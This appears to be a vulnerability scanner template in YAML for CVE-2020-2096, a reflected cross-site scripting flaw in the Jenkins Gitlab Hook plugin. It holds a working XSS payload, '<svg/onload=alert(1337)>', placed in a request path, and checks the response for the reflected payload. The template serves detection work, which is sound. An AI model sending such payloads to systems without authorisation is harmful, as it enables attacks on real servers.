21 lines
386 B
YAML
21 lines
386 B
YAML
id: CVE-2020-2096
|
|
|
|
info:
|
|
name: Jenkins Gitlab Hook XSS
|
|
author: madrobot
|
|
severity: medium
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/gitlab/build_now%3Csvg/onload=alert(1337)%3E"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- "<svg/onload=alert(1337)>"
|
|
part: body
|